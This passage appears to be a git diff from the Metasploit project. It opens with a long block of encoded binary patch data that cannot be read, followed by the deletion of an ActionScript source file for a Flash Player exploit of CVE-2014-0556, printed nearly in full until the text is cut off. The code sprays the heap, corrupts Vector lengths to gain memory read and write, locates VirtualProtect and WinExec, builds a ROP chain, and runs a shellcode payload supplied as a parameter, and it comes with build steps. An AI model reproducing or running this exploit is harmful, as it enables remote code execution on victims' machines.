zCa>HNwgnw{IdXi~!qM<@niRuQQCYv*z*Q5fkIEF3t{7y}PiG`&R+I)Rl_MwX86Orc z7V>~u#{Uc#$cWX6Y*>~Ly$N+;QcrU9gRVT zWr-2bU|7f~k{BaiHf5aAD5M%kR5D0HB37 zz|&7LPbu;EFHckoe@dfj6aBh-Khe-VBsUy_F1;rDM&9w|;c;9`ON5iNm8^uq-fvei z(pD^xa?-_9ypr7yoR91Qf0NJ3>H>K@3rFPL)9G_|z+VZ@j8srCqPaV8sS{MD>u%Ua zKuo5hxjaf#=Ud@ELtk^Wu&47T{PFR<-SuCS2ff%IVBvu_Fq@GDEw<}M&=GKxyS4Hy zRU&12_~Wx1Jh{f)5WaWY&d^l~nX)+;le*lK_wEX}Al>?6@IcaF2v#Q>TOrI_fu(M!L(-8% z6M$x-i;`-W*-znd`omM0hu}E4{yS^Pa=jIB%redxwYEiC%N;S9JLhL7hJtj!P>t*Y zivw2)`B3Z0IUAsje^_JZ(z5Jl+*OyRu--ph?#k1r=ErLkDW_PfW+=y(yp{_sMfg;r zVGmwvvVQLP=G}zw3v6N7@c-$|+Hj~#uN1T6DR`=x^8_;T)NaR(1C=eTwD4 zuas=xa8Wu&gd0srVmB}sIH3!AR`VV6Sn%t2oqeP-lccp37ng0kE(3v@7@k={fw z$XvU55`-m{$~{IY6Gf;K1?HV)|8N*1kOr>1e{lY9!)m1Igo8Rn0>|UEU5bO=V_J*% zsOo4`uwU)L<8cQ>l>I8c4^tGF-Pyf5s^o9K?6kE>-rQhT$McX?f!3`LWxkjVs_X+? zIY15~d*@E_ndH&f>^p$F&`EBZTe*l+apr=B+0M86)=Exl;4EQ%Yg>V&GGfFw{zy|! zf9X!NvT5)^BOCxss5=nAGhA05_vFrIUi>ip+&Ns^c(H()nVC)5?EfX>9@S4u{ha|ANWA`I%%fi=FO+D*xc#1 zZcq0}aF!vc#&+DranNwosO&H3su~K$lrH=U(90&UebH2X$uWcGrydGb6_Xtde^+h3 z?#NLYdT*m*WRyx8x(A{19$fiOXb?_3+3icIwin^DMO^2&3dX(UzY3sc zC9?6@IKZj38RHVX3U(RHFf7M{2H(rbX!SN#gAY6kCtoSu!oe3CZGsHjTD*dt?rPU9 zwG;2+RwevuJP4VYPUhRfhlgKsf1qoWgEII;lPg%8^@|2oBLUk&d6I#E zty1t%yA-@*JEBxh$@;{Hj%gsz5$0fTu1ingwWTuZfQR`T%l5IFOV^E8PYIIK2=`a) zf{~xxkNLB*vedO+g}_FhBW2?jm5{;LAH&Q`Tyu52ntJa{h5`BF@hQ->e^Je8ED`?1 zFH_09)*^%9Q<;JOFgqSGfLXA;twOlUcEogSfk4HKjYVZ(K2>Xq&5LA{5te3)rdv!a&fKfqha| zs-z)=9hV%T0g>J1 zob3Wc3S8)LTaR%@cWMh3LfW8LeM=g09h_hIemOIb&PSrN)OH;i#>&Hakk4k97)lBK zY@158*6!|ZIJ-arwgzYXIhv0HGB!ahmYM4gxqRJxB+1|^IuNhbfBt6!%^5l*onT6f zJw=>g#L=j$e)3B zt$Lmy=XQ@f+bk z1SQ4#_C|wg2KML@CNi8fIs~;>#QsH?PFHdODxjxe{D7>frLx)oKyujh@ zck_^ge{&@HlfXxen>7#+Lahf|AY>G+*l>jq=}YqR68X&^8^Ffok~*!HjSUn11i%c@ zH)`v5N1@N!!Hx}I1fZ%=aytC>gLT*YFy^%ulfBcx?1;|73^zH)Z2U?7nl*lq{iYC+ zgj%Talx(L}NojH59rHDQo&g!#jN9DKY43x*~Mk7o1GHLyg88dOH+hU?(&J_bF1b$Bh4@mD9Oc6tO>(sKYqBvo#R202E9oH0jX!M7( zY@CQ1jEld@39kyO9P@o|+?8U=Gtm8+`qUbiD?6yhd<=-OP;NP4$3VDzv80M z@<7#@!3`r&#+DGCGe7M$-C!8lEwD3~4_?r_Jb6~~e8J_wwiQ{G7%U*S)xI0~9YVuT zY`wLD0rpdt_EbbxT#s<1!=y4j8u5ebF7)y&Pe9?FImu9Ai4@z(WCf6Xm; z4Io-;AiAIjY3W*U80PnssfAkga{kBe)v~r>cvoW{csY`aOK#gtfVb87Pq0{A4>b~e zXWl}pyq}c`PvG86^O)vf)L_}YLK%pzO}bIM^iPw)@X^xtH$p5n*?I59Cf|qVn_7mh zk3#LF2T}D0GJ_Tl1=8blY_J_Te@{d5O#wWMNW28qi%%1xxWb}7d~NaQ5R-@nbGaEL z29LOG2=5tQTA8ZrWZgu_NIsr8Zf5)3frrF~9-r_uMsv_}g5BDV>L#{4s4TgfNnhc~ ztawgINd$o4_P`gRNE75`RQNI9pi0zL#GQ}9G~2S}Z**u^b}@XA{=0`Of8^1WZ(m8V z=KN>3R}c{zD%iKe*|MSI)Yp;&kcvGWZ22|>IOdiLcmlBfsa6;+kTv@kDbK$R&jG|2 zw2o>RK7tQ``4GM9Uhz^w^F;m2w^y8{ujRuBCXvlpS{OyNh zC?C5z!kAxJRY_=gd)h}{fAY~r2r1?(Fwy{>o0nGS+%B6L3+xf1fjB*3Q`ytxpihcK-*}T%GLKC!hE3A5Z#!%# z)FJXA{{{*x?ssQgAyWoyT|F=O++GWBi?bj*y=5!{Yrc1Uz}vmsfB%>YQaBNh&yIKJ z3WD;(1FdBEb0P~kW(F^zIIW(GGz#x68}8?|$B9q3Z>!DtLQXK#3Ry+bj92IR%NS_R z)^MFiEh*M0=-rMD`Lp;Wx^JkaZF}$fSQgfhY$z-h6?@eK0hGINg{OJmnJ#G%>i&Za zYZTw=3_B!%to4Qx@zyF^}0UlA-C#lbDsM-a{mGW(sPv>$KV{s&~3)X zI^Q^M>ILRY8dmx$X@(${+&QJcN%YcVu0s?v%VOR20}AA!2Cjjpux)CYW0UiYGDYi@DKYnF*7^mPXt{@SY%^*SO=ZC9 zF4n27Xzb!vfA)aI_*tIv<^9P*)+BT0gnAjpUz(6=!Q|KiCcr*yzm*#`#*s?` zsoCDqgD=dh;r2WI`mB7JZ}FTH1tZY*Hg>atM_Au$mfN^>7yJEv$k=1d22ry5=O|%ROe^eD-D(;tPW3ZHXO+3$!Afu0A zcqmgGsF?QzKt*vgRQntoVSk_opm%*8nW@P=6R#@b-d;46Z5Rn9GfFna?l~q4yFwpf zLl#uQ*F{pbhKwZWx&)PYH9Sh6P;e40A2a)#B>u4Lx|_$4NwSivr3FZI4_ful(=9W% zOj&45f2me=;>3jiPX^@C>kjIQ!sisN17X&9?d3Mx)`$%t?soDEM{*^>!PIw3Uld)q zF136Zlv0$D4uf;vA86+mWPwtSK3u zF|XlPrlK(N2;IDUeoZGc<$1`nR-A@HM*dzsW;{%(E5fLW2@gvf4|FN!ttDXOoBS^R zW#k;44cPGR{8W698^c|=y7P`9um6;aBUKSP%RzUt(*^S@`ndQAM56v!SA!F*R)Ea;Tya(3}Kx#(_2!61oY?O#c%W znr=Slj{>pP&xAIN@9|f2IzSoy5u%p;f7JV-%6SwzD1n)Hq!*Xk5D1~iO)$!;^4emS zt0VRw29&=&QROZBi=SC#CkxcJ7jmbv4@s_Dp)9}P@5~7OjWamu)IY*=!bW49dm;{Q=iiS<_VrA>?Nwe?Nz+ zKnk@hk=W_4vSWEn5HDF|;ZRhXzpqqUT3ST`D}}v#w7z;%aOTAtfZfvJBJI%uOa`1D z#jWe}g*m@ z@&DQ5e`vv4;V0dJ9-#3Qd-+ORe-T|mg+}Vmd7QiN=XFBFhel~^Rq9duE2HuKl%Y_C z@s^rIXN0a2b&>ui9iS;j#RXSs1V<8ce0M7vT=qN*TDw78Y7Mx&ux<9YRGQt0vYS<$ zXFp<5Eba}YQ?uJ%waQai_j&5u6GVNck{7AYsl+Ee#E4E$iyA^<>I^W7e@j(uI~5Eg zxJ(lWTf?g$jM|IdJeqi*T^EkkqoWj&BezoNeF`XG7t2e`uF1jq8W6`biEfzkpdD0_ z5HuPYn+VQO^{I6(iwcA6EPMI1Xn;`MCnhw<@azYX0q=pguvisKQM%no`(bG?6Fhz8 zN!qFOq#MWqM=`8XbGx59e{6S8$&UE5B&9#!jiT(5B1hKh*+n{njyy7T5-&%d*8IfmXR>4ltAd2if8I)<#Wp=l7FmUj z6{xI*MY|5x^@H6gC!!2MT=+ksL6(gU91j#|IuQRpda<3i zX@MtV&jY5MYXlKBe>uUf4{<`ni`d~)gEwj1n(N!5kaI9f!zzIsZpQ$?tyTc5!aS!@ z3OB;T*0{}OM&2RWx6a5hTZ}B+h@#TZOA45<@yAl}KD5a(!nK0{08~b%*kI3vdSe*#=+}n_ZyAGqg@un}(Y7BPvKg$MM0YL7&^QKq&rof8Sd00h;&Ekbl~+Ae)?uL||+e zFQOT+><1HW^X!jRC028;i-A7cK}Cy9W6XT@>3T0^ z5crdWf8e`)X;@}^fL>wkEeXPz%U ze{h$miT_F*{zV0z$%IIZ72&H)g^!`mcq*9wP$XNV>?{bZh@D=5uVcYB_lN$!*zY~R zR?)gaeI>4c({Av5y-|7;L`Y@-tS-961H=W={hH9n6cMHWAg7@^hKr`i&i~3OojPVk zRQT98hSJ=~tY$ZH%=O_e^;d(;kNZaje{@6*ta9_3tUIrBP)K%!_^+;-Fi9e%HpW?C z$*#ddb`Y8{kPII!v>6dqLG+CMX)xEt0JlN!J!5}rxnf2?Y|;KR>3#5N$2xYT2kq@X zXvna9W%7**U2ibS5?75bsal#x6t#(;C|hU7qL7RwazK^`$fu6v%01e@ z%NCdSWx_AAWaXaqN<~p;5)#sPJB2Lg;S3gwLBAu@x4_Js&2EHr33bZWA=rks(E+dO zskm`{J8&G|SzT`8}f6z)a>8zCZ z5`vI0WI;iyC;G2ET>n8gqp1wp8Sk-mkd|X4R$;XFLn_N~$tQ1@mj*_Ann7* zam4*l6hicjl~4`ZczfWpcq57ykMn2>&p(_>gEb-UD(YAwmAGDF8azn)iN>8c8k_HI zF=Kf0U|?*wI{_q*e-BkNIam~y|8oSI^;WZQczT}>1xOAUV-s&&9^Z(-0Xv5AyzMgP zv%M8(As-6k9%&=gp|RJP?I5J#59%|dBSU?BRvv_p3N+f}K}>Q+?+NjgY;IEvF=E{0 zgt`^L!!6P&Yr}-IV4b%Tqog%u*2HJ`ZZT8ntTf=&1lqk_nNANY<*&UsS7#`s_)xLC}bE|TtEdu$AcNQ5!OoHngQz*2vS2#%o9?34!&OrgE zQHYg7PVG@?gx0jfR9Rzhpb|_r-)&%5+BzbMe!&G}o&E?S()qdl5ADr>&}NWC7we(h zWs7;&l9Aqdf8w0iLZl76Hd9D?t_4;k^~5>gKOq;>;wnD5$zX}9Gvl|`*p{{kC%)qzF*wm?!1bl=d}{$ zbLh)2zXqg(?Q2j?==8r$!oD{vl^|TwD|$f&b75Jrf1&xUn&@zmhHnhxSuPpD{Pqt6 zqD6!ndLQJkTl}|Ecb!_Z2j-PdXf3W`s;cNLahFF6i6>O-dav%jbMiB|}Tm}a_#L}<#tspHubCdxvD221$g~m?h zjTB&^OY?zXD=dX9t)|IFFl&kqyjvkeZDHDlmV-adakb(bbeGu&XV9VptCm-HW{t`X zND8JSnp)`6P+H%jJFojlP}~A;)7LBGe~g^zh)9BWnsoGNcggXtpc<0^C`fJC zC-D41r!)%)k$K60-T*M3@W~xW*Lqh(u0AG)Vbf|6Z|e1Q;Jb^@Y5d$h$ChGDZ@5z8 z2G{n6p7rvwGjpGk7N%%?eqPTG@;U~&{|N&>H=19o48?C9ZVDQF;MZFefeU&jySU8L ze_%~(vOREbhRCzofo?tXx*NwS5-d=b?`d}@vP$^P0YHM(Q|mqnbSuV3$n0q?Va#GM$KPHhC@Ns9b_EDuo4E(!`W#-7!r##}0qAt^MBe<(%u zp>%Qy_+oR{`>?o@2v#XAsUxdc92G_gim6hvg>+otDzobV1rxQGi2yK`k4n*k0(%F# znv4~fn4PBW5_OReRdXXR8Q!i%g)G7Y0)fLK;IyA<0iov; zdUPQB)ZE&=Ne^8OY@>g!TQecxf1L*~!Wl!imqVIpK(lR;>-;lk&OvMim;49lUIRi< z$YydzDN+K4<~aqwcP-YNAVA$Rp%g_tWCO&%b0i0URwpAVc-kQ??)Q3{hpk9^-MFH6 zE0C*AKa~BYt0B|If`sEEYZ7?dE-e%cEU~9LX;JsA*-G>Z+_b4$#n+t6e`L;EE&X0v zh3DJt77|?=Q67)5;LvZZCJvooiY|$M&Za1kkjKEJ*YAH>ge@$c)jXXf8K$7oN z%5}h4(!ZtWiJb#C?ND-la;#pXmm2QvpT6T;su~rza#{l_K@`BW1Q2Oeb+O;4)PRzR<`boILDe^CwCU0+B=bvmMPB!hF)h>J%GFFMXn}_3PV9a@naQnsP>n}0 zH|eh`myNv97LgYHCX$>?l7dGB3s8!Juf?=Xx99zxLynIH#5j*9M||vkj~73ckP}-8 z^TR1q+)Sdv%8$-1t{``XcYH17WMhR`)_6X5G?ZX!9>qase)CX-t*0Eu=>jH|N78z=<&a}KeI>|ncKJK>A~`Hlb7@tL-(JNmFD>sO7-|R zjqutW*jk)3)7$YEDn`fVRQEzIKX7WV^J&R2J4I^~Gz1KVT<72p6~-u3lXk`;(ar$1n);YC3q0Xt zlVk78&mRKL59>dFh&oT;-1ZhD5hIQ%1XaLkMEfd`J?M5*%8K6WTGRv4e_VLn>W$I*)xMJ{!B&@}zr1bb1p4S5 zr2@ft4xb9vs$oIbOu!HLpv4JCDj5oX3;K8*!_u2x0S;U-c5Bd@WBc@l44Jy zRRBYyW+`V5Y;)fdu4|h1b>_=yTA7}97lqn<^LNFMb@OGt&(b_q{D%x)IxB&}n@rT| zf0f4$75m=`*de~bM6RNENw=N@-f9nEgm9U;B}Ff9*uU+J2kbmZtH#qxf-PGE&SfMj z*Vw2Zo0>}Cg4(PN}M(| z6q96Pb<~jZJlRa3(smW8`oyVhAlWV1YS@4dh4-YvrFuyY?|MKzqR%P^Wz%nvC9DIh zu|`}O;;Kqi4q<#I!8tV21@hn@c{4c}7zYQDT3x;m>BC@(Q*<9pq*+ziFS;!be`fv_ zjbsh+g^cx#6hpH6A!;E4Z$Z!PI__1Xe>2kL7a$vjGx8n?mZ>3iq$A%A6|7^_s3Ul1O=A8md-1gPCN628Q(K?ZPPrM#aB*7JO+@#aB9J|Er8#N0x zjK*MUKMxx!Ys0Y*|0CuhKv8rFf8Se9R<*}mYIO_`!ye#P`0mv%9^qVE23QOP9SA0Y4b zFx@3s`j+Y}0!XXy=7S{;sD-(bATMs@P@0sRB1=+WK;)51alct$b4m$ze|PH=Ht7H; zTU@rewk&OA|06pn8?Nv$M8kx|(O_=h8&cAo;%T7#(T-6v|2NU1ETaiG8x9xWB%@ev zS&N<^+_p;l^v)6M+uZ`snRQghXKW5F`ag@j=@5uxwJY%^O;FA~Vrms3=*Lx61pKET5ne}P|s66u4xs1`c#Qmj$Xm!SHts@o=OS{ly9K%=a2Jde9; zR)MpPuIlJ+NyQX988fPFzHW(Ddf42CNphI;o)dkFrL_pu#y6>KB$^umYoiWAZFEl= zMX}-CF|UBx=_Xcs2jWOHOYyl?&PP|qNCiBlF1DPb_MmArgYlBPe<9$!fZMSSu>VM> zg2;N^gh0kQkFfzC);}~bUShmZ)nY4D1n08Q3fyF?Y+)RYo~}n@bx`=@EpmB}ptV&? z(wrdGc0z`s^;T}RTyecatk_0u$^Xf&Z7Z_5_%Dv5e(YYtN0Rzx{@=AF+{l{o#2j9N z2ozxsZuVjeLHPB*FsvNI+>g02NBZB<6zLybOj?91(bmlTe^~Q({@%uf2|Vo_-^)l2 zg22vF-+KDq3t`GuTn0xlr4PP2^Amt6x0g07Fp5*Vt2i2Xs)86!dvB0(cZ;(%$A&ML z6kI^10&%2@-vyzADt(^J<+XRzb)`3gEMx03=MW4c)zu`WWf zD?m0I3hv6If7ZK?Q?u%Ip9#iKXs!4c5gy%m6#xUwIM~`qpBUJwIf4LRzudLKY`oCHX{-0a!5Ekv;TBAbh4_aH#b-IyX=uF!=NMRQGBce<#KdHs{ zL;O1#p9X<`$-Hq~)H(u3SgybBF5K~RbH~7@oupknja>4r$95mNT3>yq-w5Kfe8L=-+Py^o`!K@^qb&^` z9j`v~xB+xP-J%dWm7R*8{IA=iqW>9W?wyon*work5zwZMYCXtGP8N}sVqs=Ll~sMd zaX30BHFxzrhc-zypFyTRhrq<1k3;%Xh~M7iWcuIsx8&#ft@Y)dbQUCt?_DHR#MoFP zf4Nw;oP@g*=N;IdoUMwP4OWPu3m;KD@+5K&Q}~OMVT2XY;DvI%b`5E zAt|=3qxq8z`-gX3r4$EmumQ{N4+@puf2lDQdNlpYm8c_?YwV&u3wL6_y6~0ff|QQY zX+)9-y4D5PUp9;I{2_%2^`JT&=*l>Uf#y`0~hvIIK(=EMO(Q_4sn^xZ;-fBIuW zUzjO%P!g-udn;bgT+X<7UAdD0yrovG<5SDjY36J zK&IBZ`wlpQj062cvHcWu)>NM=SS8g;c--t;oSvCmk2NGC0dAe-bK*%x7z_n(_if04dDJX=BP3{W_{mG_^^N2bGcCY^n;E1X0+78GSs z0Q5N=m?_x>=Z!_c7Px&yrG{02xCNPXX3FA!g*#h^0R4@jwOw~O=*A2}pqRZ3CLW=;4jNl8Ecn^0pdO~67Q(;G%A^fs zQgkmUF)C3AWcj>jx{vvWcn?L5WLaGjVFMse#$0kcNdS9+_hGAkALEKcu4HBE-g`rV6pc$^CkP{6jR>%E!rjC_VIk~Bv-7_^`k zEr#Op`oL1gn=O;kf6jsw{y(m1tW;!u()~4{EBKhYb zV?=fYh>AVwe|pvxCWd)|)(NerGEB>ux26UX-&O<(Qpa-1P~!scWX?Z7{S3?m~COw@T+>5|ICVW z`N7O7%xhcg!nFJA1fhIv@s;62R{e3QhIE}lBBRDYe;knIlU`pHH;X8_^TM0SsIqiU z5AE{8<c#X-vZM9I)!Zp-wR=lEaTQ`RgTNsC&+uu8L%o|ea8p+!@ zK_*|A3>f2SB8;PTqsR?NJ?JuZ=i^4FypBzM-_kHFwZ9AqR>v8!6EAB)+idn0eYpm4 zp`4J1e~r#Cq`Tom4v~uj?FM(&`{gh3)AL1ac+lTG2VXBkN#ovUX>g&ht`4oEll6r< zL>YLd6cHjTs{%mFe?+I;3yAn+%&60(k+I1A+_Ygj#m<@R>|4D!%k#@3s9Fc9iq$!+ ztNVlVyI~(d|2Vht+G+9MD*5acbNls{@mtQxe|8FraB@EGIi*$iAZvGT9Ej4LW!*EQ zECh>}t0L~5(V^DAJ$9(+jq*%d!5HO#Q|tx0XAql8DbOk!*&B6yNRkp7-p)O8{k}d& zSgX7965>Lq?k<&zG*0fXw^2jW^A<+}xN}^IlFnas}i^#^ojC9ThEff0EywwqbzGl`?}pd@~5ddDle)EB~l zow)y+V^^T_T1Z2f`t@E-;O`n;mL7u|f9QKdny|JG5+eoTjsRY%1gaYiwr2dx z+IErN@Aa_!cc+X3f2QF$Ua{%(Fgm$HCb^>T^PaPO2{AU=Nt$F`r%j!j=FizNUeVlu zmBN~x9uY?Gw^8{Nd6Ktce-r@+caRjc>6=k)v6vn`T-L`F@ddWqI^xu7aqs(paxvTd z@9{N(6m@%6<8Noh!%a|r+lIH1bvUdQH#q5Qx-ru+uOOb0f6{jTtC84#-0kI%2K)q1 z^66RShEi?CWA};Iau=l( zwrcYHtm9}Hf5Ey)&qnUK87Q*%>!n6tgb^_ z)dTV?nHTR)Fh`ES=I)3H%r_@2-n~fVjo!CUKPA(#02iYCR#PISXR^ z4wzOlJrlOq&2k`_mIkhVg4gT=mhbZ&$=+99@$eZaDS1|B(SG0jJ zDsO<~GBj0r5ylK=QWzx>->_f3PFOa^zT$Ry0#-XEz2^Hu@Q6eLVlf_&de@**76p)7 zmB18x9XNmI<8qR2`r?w3;|-`WTfa)%hfw??e=u17UF}y>jrZ@;#$yl65DSz8VyaoS zunT?JF@UEF0&9jnf>vqu0sI$0bNo-694w}Mf{hcw&TvZRX~j4`!h%hf%y$Y%L}O3q z**fJGuj@^Cw$GkFeaolBK6z4>GxiZiDE3U3$q?9h^9Z(Unhe!dnV3fze8=A>r}p%v ze`99h+m36FEilc+IDx8K{qwNatvw=XFOlI}AXLlX35-cA zD}Le?G=vJyMeR4Wg%r_@OlE+>2=h8_G0xj0mcgcAYB!b}ocUJR4=99aq&qK&66v;r zX-AA|IG~0kQ(8Ar;h|{pyfSMKx~I!Xe}vCOjD6W$Yy#!s=iV%DU%FYcKaRzKClOb? zLy?hb`Z{Klya6+Z>lkpLYW+3PADv>t@G(vNz-H*P$CblZ_{yydYQdKFd}DgSS18?`53}M-ZxTI<{TStVyU*QxTr26^e-qU! zmi}+s*mQLQ`XwBe;#w1EtIH8OexH0Ixs4AL>Nt8)iWJldZKDp#f=2l~L}@r63R=ZA z6m=(MVyV|Zg^N}>ptUi?ziEeWjulJ*1gCKatL(%jEIpR<(5F^RZ#9k7pTD|(+8zD= zV~xcqsMgYaenlDRIR#wCK{w%Se}a*8&#G7n-Q2JychDR=^;x(G_h#>E3`KHy8_^t? zL`5VJSK6)kLbMqNd~p|0;d^oHvhC#~Za}L{g7cExhW6&^JP@5=250mnUZM*oIqU9B zqa;tRymtX~=Ii8~hdf)dz>zK2@0>*|^ms$tS{R5Qd)g%zierxzr%HhOe_KSSthM<( zFAN|>Z5E_Z1n%Z7ZnTNnRix5GDxMF%_#upv&l;zhd27Y^j{#LM6@h^6u2C6}NhTky zga$7F4NaQqKD0D+VT|f?IT;MJuuO;rmpP&yjTs4o$2)v6nx3L;IIN58=EcDOatLpf zseWl@Pe;~G9g{RoMtyYDe+_)hBbNgV4fnei?rJDJb&RbizrZ&#R*RQIR=7Oz%PKc0 zF8fNWQ&ViI+4udQEyAdZGKQ?srI^~)W_MEpi)>97ym~!NcG%!wv|CXfSP5}j6#x;R z)R#cK^`a%T0tM2lsU+GD_`i!kN43=HF_Q>$98$`hT0kgcisdk0e~}*CIY@7td50jG zR*oQ#bgM;fCV=X?F_r*pvkD~Ix&toNaDBt{GA-|T18)lrZv~)aQfFhBu?8%Uu%@XL zvaxx6$;Nf4LsuRpVHI+0NGZ@@WVh|683OFei;q8V8@%=5(TP%i_2^bir&|qy&);U??6dZ?eF#oZSP1$Ex2!R`QpcPdgd^h>caAg) zO?oEl7_%Rtct?Cd}?E-|Lv2-MI$oBllnc$X)RzQ z)i3Uh>cXg|7(V~AHgYb_gQy*+?(_QNhDiv*EJF3up!*dU%A#YWWc!o=zNd{?oi(zD>_!pe~Wcj@RyM9xG(p7)G2Tjm{+gF zo_gvy6R*&mZ=#_SfA+&0+>j&I9A$DLLQGJ;rmQa4#fvg!lfOa z)JRx`0HHuVe+Fe^{Z&?R)!){dm4VE)+vsHAn8lQlg9pSs?_i{V+JV~+nU>;4^gCeLb}U0tRV>@&>DGU#gGmWZlGspgK~ma8_kgyJKVxlq1NmO;qCTkcH&faZvCPT)<50x zo9kjoJawSZy=4IhvP?!#wGr$pE%UL`tyV4NcqOyf2=8T+@OeJi?B+`S@%^taGC~L| zYg1ld&3-%a6(NKP;z^II(9MgMR5&6B7_~al6bZMQ@ z1zmvHM}>&mF^aRU2}`hBSgIXpvLr_=k4}G~<8eWGCExS{LKNSYOU%%@nIP`Obtv68 zB$^w+2HCE6w~Bqh9k9V zYguAR=i4!pASa?p{*VF#QC*Y6e=;|g7`&q;208v5RFey zbAQ>k(x5Ymv{aHBW!-$WMO6T-mTSpUBZxth+#~2E#cR1?-SU&Cs7)PtelxJgmB_*o zk(p{_s{>KI`JvV$cljP}ET(YW79ZVte_uKxL9fWdQ1sIPcJ1=F8!=F#rmy`)qrNY3 zArjXzXQbUbbN*d%(A>A(O}5`KcqtwdZh!hcG=6$vaGg|_S(-mp1!ojSd@y%Yf?4m@ zz-lo;Ddi~!J)tNNRVb4h-8G{_N`!?=_$z~#pQE&(M8jj|U87W6u3`S{ihZ;OuF*lF zGos%z$S;<7A2xzkyyVX5v|-Xo_{P( zM2|X0i+t+$$Tv$LLZU@SJ7v!x86f`Cizj4}E&$><6L{vyYKNr^6!kWmw5hw!ve_65 z(fvzg<9xcPcY3rsdw!fgL;H29ZvyO65MIf)fIA9W z{%2EhaD5NgbgLnilcYFDJ#&IDm45KWUfw4K;-af{_K% zrLxq?)YHjc88~3k3aX%SW;jDTGF@gmI7+)AZ#(AJzf5X`oEK-IRkKH0JHN43eAr>q=eWP`EL~OYw@XU9+DNatgh!gWevTD(? Q(c7Jvw{Q>9|NC(8C<-(XjsO4v diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as deleted file mode 100755 index da6482075c..0000000000 --- a/external/source/exploits/CVE-2014-0556/Main.as +++ /dev/null @@ -1,185 +0,0 @@ -// Build how to: -// 1. Download the AIRSDK, and use its compiler. -// 2. Download the Flex SDK (4.6) -// 3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) -// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) -// 4. Build with: mxmlc -o msf.swf Main.as - -// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/ -// Modified to be used from msf - -package -{ - import flash.display.Sprite - import flash.display.BitmapData - import flash.geom.Rectangle - import flash.utils.ByteArray - import flash.display.LoaderInfo - import mx.utils.Base64Decoder - - public class Main extends Sprite - { - private var bv:Vector. = new Vector.(12800) - private var uv:Vector. = new Vector.(12800) - private var bd:BitmapData = new BitmapData(128, 16) - private var i:uint = 0 - - public function Main() - { - var b64:Base64Decoder = new Base64Decoder() - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - var payload:String = b64.toByteArray().toString() - - for (i = 0; i < bv.length; i++) { - bv[i] = new ByteArray() - bv[i].length = 0x2000 - bv[i].position = 0xFFFFF000 - } - - for (i = 0; i < bv.length; i++) - if (i % 2 == 0) bv[i] = null - - for (i = 0; i < uv.length; i++) { - uv[i] = new Vector.(1022) - } - - bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401]) - - for (i = 0; ; i++) - if (uv[i].length == 0xffffffff) break - - for (var i2:uint = 1; i2 < uv.length; i2++) { - if (i == i2) continue - uv[i2] = new Vector.(1014) - uv[i2][0] = bv[6401] - uv[i2][1] = this - } - - uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000 - bv[6401].endian = "littleEndian" - bv[6401].length = 0x500000 - var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000 - var main:uint = uv[i][0xfffffc09] - 1 - var vtable:uint = vector_read(main) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff) - byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8)) - byte_write(uv[i][0]) - - var flash:uint = base(vtable) - var winmm:uint = module("winmm.dll", flash) - var kernel32:uint = module("kernel32.dll", winmm) - var virtualprotect:uint = procedure("VirtualProtect", kernel32) - var winexec:uint = procedure("WinExec", kernel32) - var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) - var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) - - byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable - byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main - byte_write(0, "\x89\x03", false) // mov [ebx], eax - byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret - - byte_write(buffer + 0x100, payload, true) - byte_write(buffer + 0x20070, xchgeaxespret) - byte_write(buffer + 0x20000, xchgeaxesiret) - byte_write(0, virtualprotect) - - // VirtualProtect - byte_write(0, winexec) - byte_write(0, buffer + 0x30000) - byte_write(0, 0x1000) - byte_write(0, 0x40) - byte_write(0, buffer + 0x80) - - // WinExec - byte_write(0, buffer + 0x30000) - byte_write(0, buffer + 0x100) - byte_write(0) - - byte_write(main, buffer + 0x20000) - this.toString() - } - - private function vector_write(addr:uint, value:uint = 0):void - { - addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value - } - - private function vector_read(addr:uint):uint - { - return addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] - } - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) bv[6401].position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i)) - if (zero) bv[6401].writeByte(0) - } else bv[6401].writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - bv[6401].position = addr - switch(type) { - case "dword": - return bv[6401].readUnsignedInt() - case "word": - return bv[6401].readUnsignedShort() - case "byte": - return bv[6401].readUnsignedByte() - } - return 0 - } - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - for (var i:uint = 0; ; i++) { - var entry:uint = 